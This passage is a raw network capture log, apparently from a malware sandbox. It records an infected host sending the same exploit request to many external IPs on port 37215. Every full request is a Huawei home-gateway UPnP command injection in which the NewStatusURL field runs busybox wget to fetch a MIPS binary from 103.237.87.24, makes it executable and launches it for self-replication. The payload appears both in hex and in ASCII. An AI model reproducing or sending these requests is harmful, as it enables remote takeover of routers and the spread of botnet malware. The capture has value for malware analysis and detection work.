6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  733192.168.2.133519041.74.243.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313700914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  734192.168.2.1337136197.84.8.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313699961 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  735192.168.2.1360878121.175.188.8837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313700914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  736192.168.2.135532041.11.5.22037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313709974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  737192.168.2.1359722157.156.115.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313719034 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  738192.168.2.1332876197.209.253.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313750029 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  739192.168.2.134657641.230.127.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313750029 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  740192.168.2.134407841.114.48.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313779116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  741192.168.2.1343566197.14.145.17637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313780069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  742192.168.2.134437041.118.29.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.317948103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  743192.168.2.1344222197.31.223.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.317980051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
